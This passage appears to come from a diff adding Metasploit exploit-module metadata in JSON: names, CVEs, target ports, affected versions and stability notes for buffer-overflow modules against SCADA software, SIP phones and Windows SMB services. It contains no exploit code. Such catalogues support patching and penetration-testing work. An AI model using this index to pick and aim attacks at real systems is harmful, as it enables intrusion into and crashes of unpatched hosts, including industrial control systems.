+ "author": [ + "Luigi Auriemma", + "Rinat Ziyayev", + "James Fitts " + ], + "description": "This module exploits a stack based buffer overflow found in the SNMP\n NetDBServer service of Sunway Forcecontrol <= 6.1 sp3. 
The overflow is\n triggered when sending an overly long string to the listening service\n on port 2001.", + "references": [ + "OSVDB-75798", + "BID-49747", + "URL-http://aluigi.altervista.org/adv/forcecontrol_1-adv.txt" + ], + "platform": "Windows", + "arch": "", + "rport": 2001, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb", + "is_install_path": true, + "ref_name": "windows/scada/sunway_force_control_netdbsrv", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/winlog_runtime": { + "name": "Sielco Sistemi Winlog Buffer Overflow", + "fullname": "exploit/windows/scada/winlog_runtime", + "aliases": [], + "rank": 500, + "disclosure_date": "2011-01-13", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "MC " + ], + "description": "This module exploits a buffer overflow in Sielco\n Sistem Winlog <= 2.07.00. 
When sending a specially formatted\n packet to the Runtime.exe service, an attacker may be able to\n execute arbitrary code.", + "references": [ + "CVE-2011-0517", + "OSVDB-70418", + "URL-http://aluigi.org/adv/winlog_1-adv.txt", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-017-02" + ], + "platform": "Windows", + "arch": "", + "rport": 46823, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Winlog Lite 2.07.00" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/winlog_runtime.rb", + "is_install_path": true, + "ref_name": "windows/scada/winlog_runtime", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/winlog_runtime_2": { + "name": "Sielco Sistemi Winlog Buffer Overflow 2.07.14 - 2.07.16", + "fullname": "exploit/windows/scada/winlog_runtime_2", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-06-04", + "type": "exploit", + "author": [ + "Michael Messner " + ], + "description": "This module exploits a buffer overflow in Sielco Sistem Winlog <= 2.07.16.\n When sending a specially formatted packet to the Runtime.exe service on port 46824,\n an attacker may be able to execute arbitrary code.", + "references": [ + "BID-53811", + "CVE-2012-3815", + "OSVDB-82654", + "EDB-18986", + "URL-http://www.s3cur1ty.de/m1adv2012-001", + "URL-http://www.sielcosistemi.com/en/download/public/winlog_lite.html" + ], + "platform": "Windows", + "arch": "", + "rport": 46824, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Sielco Sistemi Winlog 2.07.14/2.07.16 - Ceramics Kiln Project", + "Sielco Sistemi Winlog 2.07.14 - Automatic Washing System Project" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/scada/winlog_runtime_2.rb", + "is_install_path": true, + "ref_name": "windows/scada/winlog_runtime_2", + "check": false, + 
"post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/yokogawa_bkbcopyd_bof": { + "name": "Yokogawa CENTUM CS 3000 BKBCopyD.exe Buffer Overflow", + "fullname": "exploit/windows/scada/yokogawa_bkbcopyd_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-03-10", + "type": "exploit", + "author": [ + "juan vazquez ", + "Redsadic " + ], + "description": "This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability\n exists in the service BKBCopyD.exe when handling specially crafted packets. This module has\n been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3.", + "references": [ + "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf", + "URL-https://www.rapid7.com/blog/post/2014/03/10/yokogawa-centum-cs3000-vulnerabilities", + "CVE-2014-0784" + ], + "platform": "Windows", + "arch": "", + "rport": 20111, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Yokogawa CENTUM CS 3000 R3.08.50 / Windows XP SP3" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb", + "is_install_path": true, + "ref_name": "windows/scada/yokogawa_bkbcopyd_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/yokogawa_bkesimmgr_bof": { + "name": "Yokogawa CS3000 BKESimmgr.exe Buffer Overflow", + "fullname": "exploit/windows/scada/yokogawa_bkesimmgr_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-03-10", + "type": "exploit", + "author": [ + "juan vazquez ", + "Redsadic " + ], + "description": "This module exploits an stack based buffer overflow on Yokogawa CS3000. 
The vulnerability\n exists in the BKESimmgr.exe service when handling specially crafted packets, due to an\n insecure usage of memcpy, using attacker controlled data as the size count. This module\n has been tested successfully in Yokogawa CS3000 R3.08.50 over Windows XP SP3 and Windows\n 2003 SP2.", + "references": [ + "CVE-2014-0782", + "URL-https://www.rapid7.com/blog/post/2014/05/09/r7-2013-192-disclosure-yokogawa-centum-cs-3000-vulnerabilities", + "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf" + ], + "platform": "Windows", + "arch": "", + "rport": 34205, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Yokogawa Centum CS3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb", + "is_install_path": true, + "ref_name": "windows/scada/yokogawa_bkesimmgr_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/yokogawa_bkfsim_vhfd": { + "name": "Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow", + "fullname": "exploit/windows/scada/yokogawa_bkfsim_vhfd", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-05-23", + "type": "exploit", + "author": [ + "Redsadic ", + "juan vazquez " + ], + "description": "This module exploits a stack based buffer overflow on Yokogawa CS3000. The vulnerability\n exists in the service BKFSim_vhfd.exe when using malicious user-controlled data to create\n logs using functions like vsprintf and memcpy in an insecure way. 
This module has been\n tested successfully on Yokogawa Centum CS3000 R3.08.50 over Windows XP SP3.", + "references": [ + "CVE-2014-3888", + "URL-http://jvn.jp/vu/JVNVU95045914/index.html", + "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0002E.pdf", + "URL-https://www.rapid7.com/blog/post/2014/07/07/r7-2014-06-disclosure-yokogawa-centum-cs-3000-bkfsimvhfdexe-buffer-overflow" + ], + "platform": "Windows", + "arch": "", + "rport": 20010, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb", + "is_install_path": true, + "ref_name": "windows/scada/yokogawa_bkfsim_vhfd", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/scada/yokogawa_bkhodeq_bof": { + "name": "Yokogawa CENTUM CS 3000 BKHOdeq.exe Buffer Overflow", + "fullname": "exploit/windows/scada/yokogawa_bkhodeq_bof", + "aliases": [], + "rank": 200, + "disclosure_date": "2014-03-10", + "type": "exploit", + "author": [ + "juan vazquez ", + "Redsadic " + ], + "description": "This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability\n exists in the service BKHOdeq.exe when handling specially crafted packets. 
This module has\n been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3 and Windows\n 2003 SP2.", + "references": [ + "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf", + "URL-https://www.rapid7.com/blog/post/2014/03/10/yokogawa-centum-cs3000-vulnerabilities", + "CVE-2014-0783" + ], + "platform": "Windows", + "arch": "", + "rport": 20171, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Yokogawa CENTUM CS 3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb", + "is_install_path": true, + "ref_name": "windows/scada/yokogawa_bkhodeq_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/sip/aim_triton_cseq": { + "name": "AIM Triton 1.0.4 CSeq Buffer Overflow", + "fullname": "exploit/windows/sip/aim_triton_cseq", + "aliases": [], + "rank": 500, + "disclosure_date": "2006-07-10", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in AOL\\'s AIM\n Triton 1.0.4. 
By sending an overly long CSeq value,\n a remote attacker could overflow a buffer and execute\n arbitrary code on the system with the privileges of\n the affected application.", + "references": [ + "CVE-2006-3524", + "OSVDB-27122", + "BID-18906" + ], + "platform": "Windows", + "arch": "", + "rport": 5061, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "AIM Triton 1.0.4 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/sip/aim_triton_cseq.rb", + "is_install_path": true, + "ref_name": "windows/sip/aim_triton_cseq", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/sip/sipxezphone_cseq": { + "name": "SIPfoundry sipXezPhone 0.35a CSeq Field Overflow", + "fullname": "exploit/windows/sip/sipxezphone_cseq", + "aliases": [], + "rank": 500, + "disclosure_date": "2006-07-10", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in SIPfoundry's\n sipXezPhone version 0.35a. 
By sending an long CSeq header,\n a remote attacker could overflow a buffer and execute\n arbitrary code on the system with the privileges of\n the affected application.", + "references": [ + "CVE-2006-3524", + "OSVDB-27122", + "BID-18906" + ], + "platform": "Windows", + "arch": "", + "rport": 5060, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "sipXezPhone 0.35a Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/sip/sipxezphone_cseq.rb", + "is_install_path": true, + "ref_name": "windows/sip/sipxezphone_cseq", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/sip/sipxphone_cseq": { + "name": "SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow", + "fullname": "exploit/windows/sip/sipxphone_cseq", + "aliases": [], + "rank": 500, + "disclosure_date": "2006-07-10", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in SIPfoundry's\n sipXphone 2.6.0.27. 
By sending an overly long CSeq value,\n a remote attacker could overflow a buffer and execute\n arbitrary code on the system with the privileges of\n the affected application.", + "references": [ + "CVE-2006-3524", + "OSVDB-27122", + "BID-18906" + ], + "platform": "Windows", + "arch": "", + "rport": 5060, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "SIPfoundry sipXphone 2.6.0.27 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/sip/sipxphone_cseq.rb", + "is_install_path": true, + "ref_name": "windows/sip/sipxphone_cseq", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/cve_2020_0796_smbghost": { + "name": "SMBv3 Compression Buffer Overflow", + "fullname": "exploit/windows/smb/cve_2020_0796_smbghost", + "aliases": [], + "rank": 200, + "disclosure_date": "2020-03-13", + "type": "exploit", + "author": [ + "hugeh0ge", + "chompie1337", + "Spencer McIntyre" + ], + "description": "A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to\n execute code on a vulnerable server. This remove exploit implementation leverages this flaw to execute code\n in the context of the kernel, finally yielding a session as NT AUTHORITY\\SYSTEM in spoolsv.exe. 
Exploitation\n can take a few minutes as the necessary data is gathered.", + "references": [ + "CVE-2020-0796", + "URL-https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html", + "URL-https://github.com/chompie1337/SMBGhost_RCE_PoC", + "URL-https://www.youtube.com/watch?v=RSV3f6aEJFY&t=1865s", + "URL-https://www.coresecurity.com/core-labs/articles/getting-physical-extreme-abuse-of-intel-based-paging-systems", + "URL-https://www.coresecurity.com/core-labs/articles/getting-physical-extreme-abuse-of-intel-based-paging-systems-part-2-windows", + "URL-https://labs.bluefrostsecurity.de/blog/2017/05/11/windows-10-hals-heap-extinction-of-the-halpinterruptcontroller-table-exploitation-technique/" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 10 v1903-1909 x64" + ], + "mod_time": "2022-03-10 18:03:35 +0000", + "path": "/modules/exploits/windows/smb/cve_2020_0796_smbghost.rb", + "is_install_path": true, + "ref_name": "windows/smb/cve_2020_0796_smbghost", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "SMBGhost", + "CoronaBlue" + ], + "Stability": [ + "crash-os-restarts" + ], + "Reliability": [ + "repeatable-session" + ], + "RelatedModules": [ + "exploit/windows/local/cve_2020_0796_smbghost" + ], + "SideEffects": [] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/generic_smb_dll_injection": { + "name": "Generic DLL Injection From Shared Resource", + "fullname": "exploit/windows/smb/generic_smb_dll_injection", + "aliases": [], + "rank": 0, + "disclosure_date": "2015-03-04", + "type": "exploit", + "author": [ + "Matthew Hall " + ], + "description": "This is a general-purpose module for exploiting conditions where a DLL can be loaded\n from a specified SMB share. 
This module serves payloads as DLLs over an SMB service.", + "references": [ + "CWE-114" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86", + "Windows x64" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/generic_smb_dll_injection.rb", + "is_install_path": true, + "ref_name": "windows/smb/generic_smb_dll_injection", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/group_policy_startup": { + "name": "Group Policy Script Execution From Shared Resource", + "fullname": "exploit/windows/smb/group_policy_startup", + "aliases": [], + "rank": 0, + "disclosure_date": "2015-01-26", + "type": "exploit", + "author": [ + "Sam Bertram ", + "juan vazquez " + ], + "description": "This is a general-purpose module for exploiting systems with Windows Group Policy\n configured to load VBS startup/logon scripts from remote locations. This module runs\n a SMB shared resource that will provide a payload through a VBS file. Startup scripts\n will be executed with SYSTEM privileges, while logon scripts will be executed with the\n user privileges. Have into account which the attacker still needs to redirect the\n target traffic to the fake SMB share to exploit it successfully. 
Please note in some\n cases, it will take 5 to 10 minutes to receive a session.", + "references": [ + "URL-http://blog.gdssecurity.com/labs/2015/1/26/badsamba-exploiting-windows-startup-scripts-using-a-maliciou.html", + "URL-https://github.com/GDSSecurity/BadSamba" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86", + "Windows x64" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/group_policy_startup.rb", + "is_install_path": true, + "ref_name": "windows/smb/group_policy_startup", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "badsamba" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ipass_pipe_exec": { + "name": "IPass Control Pipe Remote Command Execution", + "fullname": "exploit/windows/smb/ipass_pipe_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2015-01-21", + "type": "exploit", + "author": [ + "Matthias Kaiser", + "h0ng10 " + ], + "description": "This module exploits a vulnerability in the IPass Client service. This service provides a\n named pipe which can be accessed by the user group BUILTIN\\Users. 
This pipe can be abused\n to force the service to load a DLL from a SMB share.", + "references": [ + "CVE-2015-0925", + "OSVDB-117423", + "BID-72265", + "URL-http://codewhitesec.blogspot.de/2015/02/how-i-could-ipass-your-client-security.html" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Windows x32", + "Windows x64" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/ipass_pipe_exec.rb", + "is_install_path": true, + "ref_name": "windows/smb/ipass_pipe_exec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms03_049_netapi": { + "name": "MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow", + "fullname": "exploit/windows/smb/ms03_049_netapi", + "aliases": [], + "rank": 400, + "disclosure_date": "2003-11-11", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a stack buffer overflow in the NetApi32 NetAddAlternateComputerName\n function using the Workstation service in Windows XP.", + "references": [ + "CVE-2003-0812", + "OSVDB-11461", + "BID-9011", + "MSB-MS03-049" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Windows XP SP0/SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/ms03_049_netapi.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms03_049_netapi", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms04_007_killbill": { + "name": "MS04-007 Microsoft ASN.1 Library Bitstring Heap Overflow", + "fullname": 
"exploit/windows/smb/ms04_007_killbill", + "aliases": [], + "rank": 100, + "disclosure_date": "2004-02-10", + "type": "exploit", + "author": [ + "Solar Eclipse " + ], + "description": "This is an exploit for a previously undisclosed\n vulnerability in the bit string decoding code in the\n Microsoft ASN.1 library. This vulnerability is not related\n to the bit string vulnerability described in eEye advisory\n AD20040210-2. Both vulnerabilities were fixed in the\n MS04-007 patch. Windows 2000 SP4 Rollup 1 also patches this\n vulnerability.\n\n You are only allowed one attempt with this vulnerability. If\n the payload fails to execute, the LSASS system service will\n crash and the target system will automatically reboot itself\n in 60 seconds. If the payload succeeds, the system will no\n longer be able to process authentication requests, denying\n all attempts to login through SMB or at the console. A\n reboot is required to restore proper functioning of an\n exploited system.\n\n This exploit has been successfully tested with the win32/*/reverse_tcp\n payloads, however a few problems were encountered when using the\n equivalent bind payloads. 
Your mileage may vary.", + "references": [ + "CVE-2003-0818", + "OSVDB-3902", + "BID-9633", + "MSB-MS04-007" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Windows 2000 SP2-SP4 + Windows XP SP0-SP1" + ], + "mod_time": "2022-07-10 00:07:26 +0000", + "path": "/modules/exploits/windows/smb/ms04_007_killbill.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms04_007_killbill", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "kill-bill" + ], + "Reliability": [ + "unreliable-session" + ], + "Stability": [ + "crash-os-restarts", + "crash-service-down" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms04_011_lsass": { + "name": "MS04-011 Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow", + "fullname": "exploit/windows/smb/ms04_011_lsass", + "aliases": [], + "rank": 400, + "disclosure_date": "2004-04-13", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a stack buffer overflow in the LSASS service, this vulnerability\n was originally found by eEye. When re-exploiting a Windows XP system, you will need\n need to run this module twice. 
DCERPC request fragmentation can be performed by setting\n 'FragSize' parameter.", + "references": [ + "CVE-2003-0533", + "OSVDB-5248", + "BID-10108", + "MSB-MS04-011" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Automatic Targetting", + "Windows 2000 English", + "Windows XP English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/ms04_011_lsass.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms04_011_lsass", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms04_031_netdde": { + "name": "MS04-031 Microsoft NetDDE Service Overflow", + "fullname": "exploit/windows/smb/ms04_031_netdde", + "aliases": [], + "rank": 400, + "disclosure_date": "2004-10-12", + "type": "exploit", + "author": [ + "pusscat " + ], + "description": "This module exploits a stack buffer overflow in the NetDDE service, which is the\n precursor to the DCOM interface. This exploit effects only operating systems\n released prior to Windows XP SP1 (2000 SP4, XP SP0). 
Despite Microsoft's claim\n that this vulnerability can be exploited without authentication, the NDDEAPI\n pipe is only accessible after successful authentication.", + "references": [ + "CVE-2004-0206", + "OSVDB-10689", + "BID-11372", + "MSB-MS04-031" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Windows 2000 SP4" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/ms04_031_netdde.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms04_031_netdde", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms05_039_pnp": { + "name": "MS05-039 Microsoft Plug and Play Service Overflow", + "fullname": "exploit/windows/smb/ms05_039_pnp", + "aliases": [], + "rank": 400, + "disclosure_date": "2005-08-09", + "type": "exploit", + "author": [ + "hdm ", + "cazz " + ], + "description": "This module exploits a stack buffer overflow in the Windows Plug\n and Play service. 
This vulnerability can be exploited on\n Windows 2000 without a valid user account.\n\n NOTE: Since the PnP service runs inside the service.exe process, a failed\n exploit attempt will cause the system to automatically reboot.", + "references": [ + "CVE-2005-1983", + "OSVDB-18605", + "BID-14513", + "MSB-MS05-039" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Windows 2000 SP0-SP4", + "Windows 2000 SP4 French", + "Windows 2000 SP4 Spanish", + "Windows 2000 SP4 Universal", + "Windows 2000 SP0-SP4 German", + "Windows 2000 SP0-SP4 Italian", + "Windows XP SP1 English", + "Windows XP SP2 English (Requires Admin)", + "Windows Server 2003 SP0 English (Requires Admin)", + "Windows Server 2003 SP1 English (Requires Admin)" + ], + "mod_time": "2021-11-28 13:39:05 +0000", + "path": "/modules/exploits/windows/smb/ms05_039_pnp.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms05_039_pnp", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms06_025_rasmans_reg": { + "name": "MS06-025 Microsoft RRAS Service RASMAN Registry Overflow", + "fullname": "exploit/windows/smb/ms06_025_rasmans_reg", + "aliases": [], + "rank": 400, + "disclosure_date": "2006-06-13", + "type": "exploit", + "author": [ + "pusscat ", + "hdm " + ], + "description": "This module exploits a registry-based stack buffer overflow in the Windows Routing\n and Remote Access Service. 
Since the service is hosted inside svchost.exe,\n a failed exploit attempt can cause other system services to fail as well.\n A valid username and password is required to exploit this flaw on Windows 2000.\n When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.\n Exploiting this flaw involves two distinct steps - creating the registry key\n and then triggering an overwrite based on a read of this key. Once the key is\n created, it cannot be recreated. This means that for any given system, you\n only get one chance to exploit this flaw. Picking the wrong target will require\n a manual removal of the following registry key before you can try again:\n HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\RAS Phonebook", + "references": [ + "CVE-2006-2370", + "OSVDB-26437", + "BID-18325", + "MSB-MS06-025" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Windows 2000 SP4" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms06_025_rasmans_reg", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms06_025_rras": { + "name": "MS06-025 Microsoft RRAS Service Overflow", + "fullname": "exploit/windows/smb/ms06_025_rras", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-06-13", + "type": "exploit", + "author": [ + "Nicolas Pouvesle ", + "hdm " + ], + "description": "This module exploits a stack buffer overflow in the Windows Routing and Remote\n Access Service. Since the service is hosted inside svchost.exe, a failed\n exploit attempt can cause other system services to fail as well. 
A valid\n username and password is required to exploit this flaw on Windows 2000.\n When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.", + "references": [ + "CVE-2006-2370", + "OSVDB-26437", + "BID-18325", + "MSB-MS06-025" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Automatic", + "Windows 2000 SP4", + "Windows XP SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/ms06_025_rras.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms06_025_rras", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms06_040_netapi": { + "name": "MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow", + "fullname": "exploit/windows/smb/ms06_040_netapi", + "aliases": [], + "rank": 400, + "disclosure_date": "2006-08-08", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function\n using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that\n other RPC calls could be used to exploit this service. This exploit will result in\n a denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt\n will likely result in a complete reboot on Windows 2000 and the termination of all\n SMB-related services on Windows XP. 
The default target for this exploit should succeed\n on Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.", + "references": [ + "CVE-2006-3439", + "OSVDB-27845", + "BID-19409", + "MSB-MS06-040" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)", + "(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4", + "(wcscpy) Windows XP SP0/SP1", + "(stack) Windows XP SP1 English", + "(stack) Windows XP SP1 Italian", + "(wcscpy) Windows 2003 SP0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/ms06_040_netapi.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms06_040_netapi", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [ + "unreliable-session" + ], + "Stability": [ + "crash-os-restarts", + "crash-service-down" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms06_066_nwapi": { + "name": "MS06-066 Microsoft Services nwapi32.dll Module Exploit", + "fullname": "exploit/windows/smb/ms06_066_nwapi", + "aliases": [], + "rank": 400, + "disclosure_date": "2006-11-14", + "type": "exploit", + "author": [ + "pusscat " + ], + "description": "This module exploits a stack buffer overflow in the svchost service when the netware\n client service is running. 
This specific vulnerability is in the nwapi32.dll module.", + "references": [ + "CVE-2006-4688", + "OSVDB-30260", + "BID-21023", + "MSB-MS06-066" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Windows XP SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/ms06_066_nwapi.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms06_066_nwapi", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms06_066_nwwks": { + "name": "MS06-066 Microsoft Services nwwks.dll Module Exploit", + "fullname": "exploit/windows/smb/ms06_066_nwwks", + "aliases": [], + "rank": 400, + "disclosure_date": "2006-11-14", + "type": "exploit", + "author": [ + "pusscat " + ], + "description": "This module exploits a stack buffer overflow in the svchost service, when the netware\n client service is running. 
